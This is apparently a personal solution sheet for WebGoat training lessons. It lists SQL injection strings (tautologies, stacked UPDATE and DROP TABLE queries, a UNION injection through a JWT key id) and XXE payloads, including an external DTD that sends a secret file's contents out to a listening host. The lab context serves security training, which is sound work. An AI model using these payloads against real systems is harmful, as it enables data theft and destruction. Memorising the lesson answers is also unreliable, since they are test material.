https://github.com/WebGoat/WebGoat/wiki/(Almost)-Fully-Documented-Solution-(en)#sql-injection-mitigation
https://docs.cycubix.com/web-application-security-essentials/solutions/a2-broken-authentication/jwt-tokens-5

A1-1-2
SELECT department FROM employees WHERE first_name='Bob'

A1-1-3
UPDATE employees SET department='Sales' WHERE first_name='Tobi'

A1-1-4
ALTER TABLE employees ADD phone varchar(20)

A1-1-5
GRANT SELECT ON grant_rights TO unauthorized_user

A1-1-10
login_count = 0
user_id = 0 or 1=1

A1-1-11
A
' or '1' = '1

A1-1-12
A
'; UPDATE employees SET salary=99999 WHERE first_name='John

A1-1-13
%'; DROP TABLE access_log;--


A1-2-3
'; SELECT * FROM user_system_data;--
passW0rD

A1-2-5
tom
thisisasecretfortomonly

xxe 4:
<?xml version="1.0"?><!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;</text></comment>



xxe7:
<?xml version="1.0"?><!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;</text></comment>



xxe11:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY % file SYSTEM "file:///home/webgoat/.webgoat-8.2.2//XXE/secret.txt" >
<!ENTITY % dtd SYSTEM "http://0.0.0.0:9090/files/username/attack.dtd" >
%dtd;]>
<comment>
<text>test&send;</text>
</comment>



attack.dtd:
<?xml version="1.0" encoding="UTF-8"?>



<!ENTITY % all "<!ENTITY send SYSTEM 'http://0.0.0.0:9090/landing?%file;' >" >%all;


tom:
Kid
ABC' UNION SELECT 'U3Jp' FROM INFORMATION_SCHEMA.SYSTEM_USERS; --



